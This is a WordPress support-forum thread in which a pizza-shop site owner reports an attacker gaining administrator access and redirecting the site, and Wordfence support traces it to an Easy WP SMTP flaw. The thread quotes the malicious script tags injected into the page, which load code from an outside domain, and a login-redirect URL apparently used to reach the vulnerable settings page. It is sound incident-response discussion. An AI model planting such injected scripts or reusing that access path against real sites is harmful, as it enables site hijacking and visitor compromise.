• Resolved winner singh

    (@winner-singh)


    HI,

    I want to talk about my website which is e-commerce website,

    Yesterday night I got the email from the website that

    
    1. 
    9:56 pm, March 19 - New user registration on your site Pizza Home: 
    
    Username: devidpentesting99
    
    Email: devidpentesting@yandex.ru
    
    2 
    Then I got the email
    Password changed for user: devidpentesting99 at 4:05 am 
    
    3
     at 5:30 AM, March 20
    This email was sent from your website "Pizza Home" by the Wordfence plugin at Wednesday 20th of March 2019 at 01:00:36 PM
    The Wordfence administrative URL for this site is: https://www.pizzahome.co.nz/wp-admin/admin.php?page=Wordfence
    A user with username "devidpentesting99" who has administrator access signed in to your WordPress site.
    User IP: 185.212.131.46
    User hostname: jacksonblue1.ptr1.ru
    User location: Netherlands
    
    4 
    at 6:58 AM, March 20
    This email was sent from your website "Pizza Home" by the Wordfence plugin at Wednesday 20th of March 2019 at 02:28:26 PM
    The Wordfence administrative URL for this site is: https://getmyfreetraffic.com/n90sab35473/wp-admin/admin.php?page=Wordfence
    A user with username "devidpentesting99" who has administrator access signed in to your WordPress site.
    User IP: 185.212.131.45
    User hostname: jacksonblue.ptr1.ru
    User location: Netherlands
    

    and then my site is hacked it is redirecting to some blog, please tell me how someone created him as an administrator, yes it is a shopping cart, the user can create an account, the user can change the password.
    but how someone did this, what type of hacking is this.! my hosting company is also investigating this. I am using wordfence since two years,never happened this kind of hack, Suggest me so that i will be careful next time.

    • This topic was modified 8 months, 2 weeks ago by winner singh.
    • This topic was modified 8 months, 2 weeks ago by winner singh.
    • This topic was modified 8 months, 2 weeks ago by winner singh.
    • This topic was modified 8 months, 2 weeks ago by winner singh.
Viewing 6 replies - 1 through 6 (of 6 total)
  • Plugin Support wfdave

    (@wfdave)

    Hi @winner-singh,

    I just visited your site at https://www.pizzahome.co.nz/.

    There was a malicious script attached to the top of the page:

    <script type='text/javascript' async src='https://setforspecialdomain.com/in2herg42t2?type=in2&frm=scr&'></script><script type='text/javascript' async src='https://setforspecialdomain.com/in2herg42t2?type=in2&frm=scr&'></script><script type='text/javascript' async src='https://setforspecialdomain.com/in2herg42t2?type=in2&frm=scr&'></script><script type='text/javascript' async src='https://setforspecialdomain.com/in2herg42t2?type=in2&frm=scr&'></script>

    Can you run this query to reset the siteurl and home?

    UPDATE wp_options SET option_value="https://www.pizzahome.co.nz" WHERE option_name = "siteurl" OR option_name = "home";

    Please also open up /index.php and see if <script type='text/javascript'... was added to the top.

    Dave

    @wfdave Thank you for reply, Yes I saw that code in the index.php file I removed that but still site is not working, what other files i need to check, my hosting company replied me that

    ” It appears that you’re running into a
    recently-discovered exploit in the Easy WP SMTP plugin”

    • This reply was modified 8 months, 2 weeks ago by winner singh.
    Plugin Support wfdave

    (@wfdave)

    Hi again,

    Did you run the query that should reset your WordPress options back to normal?

    Easy WP SMTP recently fixed a critical security flaw which allowed an attacker to change the data within wp_options.

    I refreshed your site and it seems to be fine.

    Dave

    @wfdave Hi again, By the grace of God, I found the backup, which was online actually in the backup folder in the rar file, via BackUpWordPress plugin, it automatically generated the backup on March 16, and save my life.

    Now I updated the plugin Easy WP SMTP but please tell me how hacker add the javascript code in the index file and other things, suggestions on what factors I need to be careful, and yes also wordfence send me an email early in the morning that someone is login as an administrator.thx wordfence also.

    so in future, if something happens like, What should I need to do
    should I set the permission 444 via ftp to these files

    wp-content 755
    wp-includes 644
    All .php files 644
    All folders 755
    wp-config.php 444
    index.php 444

    • This reply was modified 8 months, 2 weeks ago by winner singh.
    • This reply was modified 8 months, 2 weeks ago by winner singh.
    • This reply was modified 8 months, 2 weeks ago by winner singh.

    @macnetwork @tvoltz on the support form of the SMTP, they replied that solved the Vulnerability, users need to update the plugin. Here was the trick by hacker
    https://www.domain.com/wp-login.php?redirect_to=https://www.domain.com/wp-admin/options-general.php?page=swpsmtp_settings&reauth=1
    HTTP 200 OK

    so directly goes to SMTP page where they found Vulnerability, I think someone should make the video of this from wordfence, so that we all users will be careful next time or suggest any other plugin for SMTP.

    Plugin Support wfdave

    (@wfdave)

    Hi @winner-singh,

    The attacker was able to change two vital keys within the database.

    They changed siteurl and homeurl which affected where all the links are your site would point to.

    Dave

Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘Site compromised’ is closed to new replies.